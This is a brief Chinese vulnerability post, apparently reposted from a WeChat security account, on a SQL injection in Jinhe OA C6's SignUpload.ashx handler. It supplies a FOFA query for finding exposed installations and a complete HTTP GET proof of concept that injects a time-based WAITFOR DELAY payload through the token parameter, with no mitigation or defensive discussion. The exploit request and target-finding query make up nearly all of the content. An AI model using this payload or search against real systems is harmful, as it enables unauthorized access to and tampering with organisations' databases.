FOFA
app="金和网络-金和OA"
漏洞复现
POC
GET /C6/Jhsoft.Web.ask/SignUpload.ashx?token=1%3BWAITFOR+DELAY+%270%3A0%3A%205%27+--%20and%201=1_123_123&filename=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537
Accept-Encoding: gzip
Connection: close
nuclei运行结果
nuclei-poc已上传到知识星球
原文始发于微信公众号(CatalyzeSec):金和OA C6 SignUpload SQL注入漏洞复现及POC
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论